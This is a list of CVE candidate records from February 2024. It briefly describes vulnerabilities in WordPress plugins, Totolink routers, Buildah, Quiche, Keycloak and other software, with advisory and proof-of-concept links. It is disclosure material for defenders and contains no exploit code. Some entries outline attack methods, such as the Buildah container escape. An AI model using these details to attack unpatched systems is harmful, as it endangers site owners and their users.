CVE 2024 1785 Candidate The Contests by Rewards Fuel plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.62. This is due to missing or incorrect nonce validation on the ajax_handler() function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site's user with the edit_posts capability into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3039978%40contests-from-rewards-fuel&new=3039978%40contests-from-rewards-fuel&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3039978%40contests-from-rewards-fuel&new=3039978%40contests-from-rewards-fuel&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/689f3667-2dda-40a8-8627-d38c6c6816fc?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/689f3667-2dda-40a8-8627-d38c6c6816fc?source=cve Assigned (20240222)
CVE 2024 1784 Candidate A vulnerability classified as problematic was found in Limbas 5.2.14. Affected by this vulnerability is an unknown functionality of the file main_admin.php. The manipulation of the argument tab_group leads to sql injection. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254575. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254575 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254575 | MISC:VDB-254575 | Limbas main_admin.php sql injection | URL:https://vuldb.com/?id.254575 | MISC:https://github.com/liyako/vulnerability/blob/main/POC/Limbas-Blind-SQL-injection.md | URL:https://github.com/liyako/vulnerability/blob/main/POC/Limbas-Blind-SQL-injection.md Assigned (20240222)
CVE 2024 1783 Candidate A vulnerability classified as critical has been found in Totolink LR1200GB 9.1.0u.6619_B20230130/9.3.5u.6698_B20230810. Affected is the function loginAuth of the file /cgi-bin/cstecgi.cgi of the component Web Interface. The manipulation of the argument http_host leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-254574 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254574 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.254574 | MISC:VDB-254574 | Totolink LR1200GB Web Interface cstecgi.cgi loginAuth stack-based overflow | URL:https://vuldb.com/?id.254574 | MISC:https://gist.github.com/manishkumarr1017/30bca574e2f0a6d6336115ba71111984 | URL:https://gist.github.com/manishkumarr1017/30bca574e2f0a6d6336115ba71111984 Assigned (20240222)
CVE 2024 1782 Candidate The Blue Triad EZAnalytics plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'bt_webid' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/blue-triad-ezanalytics/trunk/blue-triad-ezanalytics.php | URL:https://plugins.trac.wordpress.org/browser/blue-triad-ezanalytics/trunk/blue-triad-ezanalytics.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0cae2bb8-33e7-47b0-861d-b976a67660ae?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0cae2bb8-33e7-47b0-861d-b976a67660ae?source=cve Assigned (20240222)
CVE 2024 1781 Candidate A vulnerability was found in Totolink X6000R AX3000 9.4.0cu.852_20230719. It has been rated as critical. This issue affects the function setWizardCfg of the file /cgi-bin/cstecgi.cgi of the component shttpd. The manipulation leads to command injection. The exploit has been disclosed to the public and may be used. The identifier VDB-254573 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254573 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254573 | MISC:VDB-254573 | Totolink X6000R AX3000 shttpd cstecgi.cgi setWizardCfg command injection | URL:https://vuldb.com/?id.254573 | MISC:https://github.com/Icycu123/X6000R-AX3000-Wifi-6-Giga/blob/main/2/X6000R%20AX3000%20WiFi%206%20Giga%E7%84%A1%E7%B7%9A%E8%B7%AF%E7%94%B1%E5%99%A8%E6%9C%AA%E6%8E%88%E6%9D%83rce.md | URL:https://github.com/Icycu123/X6000R-AX3000-Wifi-6-Giga/blob/main/2/X6000R%20AX3000%20WiFi%206%20Giga%E7%84%A1%E7%B7%9A%E8%B7%AF%E7%94%B1%E5%99%A8%E6%9C%AA%E6%8E%88%E6%9D%83rce.md Assigned (20240222)
CVE 2024 1779 Candidate The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the zt_dcfcf_change_status() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to alter the message read status of messages. MISC:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/class.ztdcfcf.admin.action.php#L213 | URL:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/class.ztdcfcf.admin.action.php#L213 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/52e4f79f-1148-4530-8d78-377a7365978a?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/52e4f79f-1148-4530-8d78-377a7365978a?source=cve Assigned (20240222)
CVE 2024 1778 Candidate The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the zt_dcfcf_change_bookmark() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to alter bookmark statuses. MISC:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/class.ztdcfcf.admin.action.php#L235 | URL:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/class.ztdcfcf.admin.action.php#L235 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d74040d0-1fee-4906-af6f-a5d842c42fd4?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d74040d0-1fee-4906-af6f-a5d842c42fd4?source=cve Assigned (20240222)
CVE 2024 1777 Candidate The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the settings update function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/inc/settings.php#L301 | URL:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/inc/settings.php#L301 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b411a97b-2f1c-4feb-b1c7-bc5a1aab7f33?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b411a97b-2f1c-4feb-b1c7-bc5a1aab7f33?source=cve Assigned (20240222)
CVE 2024 1776 Candidate The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to SQL Injection via the 'form-id' parameter in all versions up to, and including, 1.1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/inc/settings.php#L301 | URL:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/inc/settings.php#L301 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7bff8172-b879-40b0-a229-a54787baa38a?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7bff8172-b879-40b0-a229-a54787baa38a?source=cve Assigned (20240222)
CVE 2024 1775 Candidate The Nextend Social Login and Register plugin for WordPress is vulnerable to a self-based Reflected Cross-Site Scripting via the ‘error_description’ parameter in all versions up to, and including, 3.1.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers, with access to a subscriber-level account, to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. NOTE: This vulnerability can be successfully exploited on a vulnerable WordPress instance against an OAuth pre-authenticated higher-level user (e.g., administrator) by leveraging a cross-site request forgery in conjunction with a certain social engineering technique to achieve a critical impact scenario (cross-site scripting to administrator-level account creation). However, successful exploitation requires "Debug mode" to be enabled in the plugin's "Global Settings". MISC:https://plugins.trac.wordpress.org/changeset/3042326/nextend-facebook-connect | URL:https://plugins.trac.wordpress.org/changeset/3042326/nextend-facebook-connect | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3bad1d0d-3817-4c7f-a012-5a85b577781e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3bad1d0d-3817-4c7f-a012-5a85b577781e?source=cve Assigned (20240222)
CVE 2024 1773 Candidate The PDF Invoices and Packing Slips For WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.7 via deserialization of untrusted input via the order_id parameter. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. MISC:https://plugins.trac.wordpress.org/browser/pdf-invoices-and-packing-slips-for-woocommerce/trunk/includes/class-apifw-front-end.php#L94 | URL:https://plugins.trac.wordpress.org/browser/pdf-invoices-and-packing-slips-for-woocommerce/trunk/includes/class-apifw-front-end.php#L94 | MISC:https://plugins.trac.wordpress.org/changeset/3042740/ | URL:https://plugins.trac.wordpress.org/changeset/3042740/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4dc6e879-4ccf-485e-b02d-2b291e67df40?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4dc6e879-4ccf-485e-b02d-2b291e67df40?source=cve Assigned (20240222)
CVE 2024 1772 Candidate The Play.ht – Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.6.4 via deserialization of untrusted input from the play_podcast_data post meta. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. MISC:https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php#L138 | URL:https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php#L138 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/83a595b7-379c-4202-abdd-d8ba4a30c6a4?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/83a595b7-379c-4202-abdd-d8ba4a30c6a4?source=cve Assigned (20240222)
CVE 2024 1771 Candidate The Total theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the total_order_sections() function in all versions up to, and including, 2.1.59. This makes it possible for authenticated attackers, with subscriber-level access and above, to repeat sections on the homepage. MISC:https://themes.trac.wordpress.org/browser/total/2.1.59/inc/customizer/customizer-functions.php#L112 | URL:https://themes.trac.wordpress.org/browser/total/2.1.59/inc/customizer/customizer-functions.php#L112 | MISC:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=219020%40total%2F2.1.60&old=216973%40total%2F2.1.59 | URL:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=219020%40total%2F2.1.60&old=216973%40total%2F2.1.59 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/26b64ae3-5839-47d5-9c65-7c595bb18e6c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/26b64ae3-5839-47d5-9c65-7c595bb18e6c?source=cve Assigned (20240222)
CVE 2024 1769 Candidate The JM Twitter Cards plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 12 via the meta description data. This makes it possible for unauthenticated attackers to view password protected post content when viewing the page source. MISC:https://wordpress.org/plugins/jm-twitter-cards/ | URL:https://wordpress.org/plugins/jm-twitter-cards/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b48e5973-6923-47cc-a660-ecc989f540f8?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b48e5973-6923-47cc-a660-ecc989f540f8?source=cve Assigned (20240222)
CVE 2024 1767 Candidate The Blocksy theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's blocks in all versions up to, and including, 2.0.26 due to insufficient input sanitization and output escaping on user supplied attributes like 'className' and 'radius'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=219324%40blocksy&new=219324%40blocksy&sfp_email=&sfph_mail= | URL:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=219324%40blocksy&new=219324%40blocksy&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/fdeab668-9094-485f-aa01-13ba5c10ea89?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/fdeab668-9094-485f-aa01-13ba5c10ea89?source=cve Assigned (20240222)
CVE 2024 1765 Candidate Cloudflare Quiche (through version 0.19.1/0.20.0) was affected by an unlimited resource allocation vulnerability causing rapid increase of memory usage of the system running quiche server or client. A remote attacker could take advantage of this vulnerability by repeatedly sending an unlimited number of 1-RTT CRYPTO frames after previously completing the QUIC handshake. Exploitation was possible for the duration of the connection which could be extended by the attacker. quiche 0.19.2 and 0.20.1 are the earliest versions containing the fix for this issue. MISC:https://github.com/cloudflare/quiche/security/advisories/GHSA-78wx-jg4j-5j6g | URL:https://github.com/cloudflare/quiche/security/advisories/GHSA-78wx-jg4j-5j6g Assigned (20240222)
CVE 2024 1764 Candidate Improper privilege management in Just-in-time (JIT) elevation module in Devolutions Server 2023.3.14.0 and earlier allows a user to continue using the elevated privilege even after the expiration under specific circumstances MISC:https://devolutions.net/security/advisories/DEVO-2024-0002 | URL:https://devolutions.net/security/advisories/DEVO-2024-0002 Assigned (20240222)
CVE 2024 1763 Candidate The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the /wp_social/v1/ REST API endpoint in all versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to enable and disable certain providers for the social share and login features. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042283%40wp-social&new=3042283%40wp-social&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042283%40wp-social&new=3042283%40wp-social&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4f145c85-f3c6-46a7-b8ae-d486dd23087d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4f145c85-f3c6-46a7-b8ae-d486dd23087d?source=cve Assigned (20240222)
CVE 2024 1761 Candidate The WP Chat App plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget/block in all versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping on user supplied attributes such as 'buttonColor' and 'phoneNumber'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044368%40wp-whatsapp%2Ftrunk&old=3029885%40wp-whatsapp%2Ftrunk&sfp_email=&sfph_mail=#file4 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044368%40wp-whatsapp%2Ftrunk&old=3029885%40wp-whatsapp%2Ftrunk&sfp_email=&sfph_mail=#file4 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/85a94f32-e1e5-48ea-822e-c54d0592da28?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/85a94f32-e1e5-48ea-822e-c54d0592da28?source=cve Assigned (20240222)
CVE 2024 1760 Candidate The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6.6.20. This is due to missing or incorrect nonce validation on the ssa_factory_reset() function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/class-support.php#L527 | URL:https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/class-support.php#L527 | MISC:https://plugins.trac.wordpress.org/changeset/3042890/simply-schedule-appointments/trunk/includes/class-support.php | URL:https://plugins.trac.wordpress.org/changeset/3042890/simply-schedule-appointments/trunk/includes/class-support.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0eec9744-6dbd-42bd-b9c5-c9d792cecf4b?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0eec9744-6dbd-42bd-b9c5-c9d792cecf4b?source=cve Assigned (20240222)
CVE 2024 1758 Candidate The SuperFaktura WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.40.3 via the wc_sf_url_check function. This makes it possible for authenticated attackers, with subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. MISC:https://plugins.trac.wordpress.org/browser/woocommerce-superfaktura/trunk/class-wc-superfaktura.php#L3418 | URL:https://plugins.trac.wordpress.org/browser/woocommerce-superfaktura/trunk/class-wc-superfaktura.php#L3418 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040372%40woocommerce-superfaktura&new=3040372%40woocommerce-superfaktura&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040372%40woocommerce-superfaktura&new=3040372%40woocommerce-superfaktura&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/520598d7-863f-4bf3-ba74-fa9b2cc32767?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/520598d7-863f-4bf3-ba74-fa9b2cc32767?source=cve Assigned (20240222)
CVE 2024 1753 Candidate A flaw was found in Buildah (and subsequently Podman Build) which allows containers to mount arbitrary locations on the host filesystem into build containers. A malicious Containerfile can use a dummy image with a symbolic link to the root filesystem as a mount source and cause the mount operation to mount the host root filesystem inside the RUN step. The commands inside the RUN step will then have read-write access to the host filesystem, allowing for full container escape at build time. MISC:RHBZ#2265513 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2265513 | MISC:https://access.redhat.com/security/cve/CVE-2024-1753 | URL:https://access.redhat.com/security/cve/CVE-2024-1753 | MISC:https://github.com/containers/buildah/security/advisories/GHSA-pmf3-c36m-g5cf | URL:https://github.com/containers/buildah/security/advisories/GHSA-pmf3-c36m-g5cf | MISC:https://github.com/containers/podman/security/advisories/GHSA-874v-pj72-92f3 | URL:https://github.com/containers/podman/security/advisories/GHSA-874v-pj72-92f3 Assigned (20240222)
CVE 2024 1751 Candidate The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to time-based SQL Injection via the question_id parameter in all versions up to, and including, 2.6.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber/student access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/browser/tutor/tags/2.6.1/classes/Utils.php#L4555 | URL:https://plugins.trac.wordpress.org/browser/tutor/tags/2.6.1/classes/Utils.php#L4555 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f9cee379-79f8-4a60-b1bb-ccab1e954512?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f9cee379-79f8-4a60-b1bb-ccab1e954512?source=cve Assigned (20240222)
CVE 2024 1750 Candidate A vulnerability, which was classified as critical, was found in TemmokuMVC up to 2.3. Affected is the function get_img_url/img_replace in the library lib/images_get_down.php of the component Image Download Handler. The manipulation leads to deserialization. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254532. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254532 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.254532 | MISC:VDB-254532 | TemmokuMVC Image Download images_get_down.php img_replace deserialization | URL:https://vuldb.com/?id.254532 | MISC:https://note.zhaoj.in/share/OrBH8zLKUPOA | URL:https://note.zhaoj.in/share/OrBH8zLKUPOA Assigned (20240222)
CVE 2024 1749 Candidate A vulnerability, which was classified as problematic, has been found in Bdtask Bhojon Best Restaurant Management Software 2.9. This issue affects some unknown processing of the file /dashboard/message of the component Message Page. The manipulation of the argument Title leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254531. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254531 | Bdtask Bhojon Best Restaurant Management Software Message Page message cross site scripting | URL:https://vuldb.com/?id.254531 | MISC:VDB-254531 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254531 | MISC:https://drive.google.com/file/d/1oM1h3E9G17lgkbSnhq7FQjfAtEojDNFo/view?usp=sharing | URL:https://drive.google.com/file/d/1oM1h3E9G17lgkbSnhq7FQjfAtEojDNFo/view?usp=sharing Assigned (20240222)
CVE 2024 1748 Candidate A vulnerability classified as critical was found in van_der_Schaar LAB AutoPrognosis 0.1.21. This vulnerability affects the function load_model_from_file of the component Release Note Handler. The manipulation leads to deserialization. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. VDB-254530 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254530 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.254530 | MISC:VDB-254530 | van_der_Schaar LAB AutoPrognosis Release Note load_model_from_file deserialization | URL:https://vuldb.com/?id.254530 | MISC:https://github.com/bayuncao/vul-cve-13 | URL:https://github.com/bayuncao/vul-cve-13 Assigned (20240222)
CVE 2024 1745 Candidate The Testimonial Slider WordPress plugin before 2.3.7 does not properly ensure that a user has the necessary capabilities to edit certain sensitive Testimonial Slider WordPress plugin before 2.3.7 settings, making it possible for users with at least the Author role to edit them. MISC:https://wpscan.com/vulnerability/b63bbfeb-d6f7-4c33-8824-b86d64d3f598/ | URL:https://wpscan.com/vulnerability/b63bbfeb-d6f7-4c33-8824-b86d64d3f598/ Assigned (20240222)
CVE 2024 1742 Candidate Invocation of the sqlplus command with sensitive information in the command line in the mk_oracle Checkmk agent plugin before Checkmk 2.3.0b4 (beta), 2.2.0p24, 2.1.0p41 and 2.0.0 (EOL) allows the extraction of this information from the process list. MISC:https://checkmk.com/werk/16234 | URL:https://checkmk.com/werk/16234 Assigned (20240222)
CVE 2024 1735 Candidate A vulnerability has been identified in armeria-saml versions less than 1.27.2, allowing the use of malicious SAML messages to bypass authentication. All users who rely on armeria-saml older than version 1.27.2 must upgrade to 1.27.2 or later. MISC:https://github.com/line/armeria/security/advisories/GHSA-4m6j-23p2-8c54 | URL:https://github.com/line/armeria/security/advisories/GHSA-4m6j-23p2-8c54 Assigned (20240222)
CVE 2024 1733 Candidate The Word Replacer Pro plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the word_replacer_ultra() function in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to update arbitrary content on the affected WordPress site. MISC:https://plugins.trac.wordpress.org/browser/word-replacer-ultra/trunk/inc/word-replacer-ultra-ajax.php#L16 | URL:https://plugins.trac.wordpress.org/browser/word-replacer-ultra/trunk/inc/word-replacer-ultra-ajax.php#L16 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1da53718-c2a2-45d0-ad43-daff3c68342d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1da53718-c2a2-45d0-ad43-daff3c68342d?source=cve Assigned (20240222)
CVE 2024 1731 Candidate The Auto Refresh Single Page plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1 via deserialization of untrusted input from the arsp_options post meta option. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. MISC:https://plugins.trac.wordpress.org/browser/auto-refresh-single-page/trunk/auto-refresh-single-page.php#L42 | URL:https://plugins.trac.wordpress.org/browser/auto-refresh-single-page/trunk/auto-refresh-single-page.php#L42 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5f8f8d46-d7e7-4b07-9b10-15e579973474?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5f8f8d46-d7e7-4b07-9b10-15e579973474?source=cve Assigned (20240222)
CVE 2024 1727 Candidate To prevent malicious 3rd party websites from making requests to Gradio applications running locally, this PR tightens the CORS rules around Gradio applications. In particular, it checks to see if the host header is localhost (or one of its aliases) and if so, it requires the origin header (if present) to be localhost (or one of its aliases) as well. MISC:https://github.com/gradio-app/gradio/commit/84802ee6a4806c25287344dce581f9548a99834a | URL:https://github.com/gradio-app/gradio/commit/84802ee6a4806c25287344dce581f9548a99834a | MISC:https://huntr.com/bounties/a94d55fb-0770-4cbe-9b20-97a978a2ffff | URL:https://huntr.com/bounties/a94d55fb-0770-4cbe-9b20-97a978a2ffff Assigned (20240221)
CVE 2024 1725 Candidate A flaw was found in the kubevirt-csi component of OpenShift Virtualization's Hosted Control Plane (HCP). This issue could allow an authenticated attacker to gain access to the root HCP worker node's volume by creating a custom Persistent Volume that matches the name of a worker node. MISC:RHBZ#2265398 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2265398 | MISC:https://access.redhat.com/security/cve/CVE-2024-1725 | URL:https://access.redhat.com/security/cve/CVE-2024-1725 Assigned (20240221)
CVE 2024 1723 Candidate The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 1.58.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Affected parameters include: $instance['fonts']['title_options']['tag'], $headline_tag, $sub_headline_tag, $feature['icon']. MISC:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.58.6/widgets/features/tpl/default.php#L90 | URL:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.58.6/widgets/features/tpl/default.php#L90 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044174%40so-widgets-bundle%2Ftrunk&old=3040814%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044174%40so-widgets-bundle%2Ftrunk&old=3040814%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e63c566d-744b-42f5-9ba6-9007cc60313a?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e63c566d-744b-42f5-9ba6-9007cc60313a?source=cve Assigned (20240221)
CVE 2024 1722 Candidate A flaw was found in Keycloak. In certain conditions, this issue may allow a remote unauthenticated attacker to block other accounts from logging in. MISC:RHBZ#2265389 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2265389 | MISC:https://access.redhat.com/security/cve/CVE-2024-1722 | URL:https://access.redhat.com/security/cve/CVE-2024-1722 Assigned (20240221)
CVE 2024 1720 Candidate The User Registration – Custom Registration Form, Login Form, and User Profile WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Display Name' parameter in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability requires social engineering to successfully exploit, and the impact would be very limited due to the attacker requiring a user to login as the user with the injected payload for execution. MISC:https://plugins.trac.wordpress.org/browser/user-registration/trunk/includes/class-ur-shortcodes.php#L288 | URL:https://plugins.trac.wordpress.org/browser/user-registration/trunk/includes/class-ur-shortcodes.php#L288 | MISC:https://plugins.trac.wordpress.org/changeset/3045419/user-registration/trunk/includes/class-ur-shortcodes.php | URL:https://plugins.trac.wordpress.org/changeset/3045419/user-registration/trunk/includes/class-ur-shortcodes.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/62b809dc-4089-4822-8aeb-7049fcfe376e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/62b809dc-4089-4822-8aeb-7049fcfe376e?source=cve Assigned (20240221)
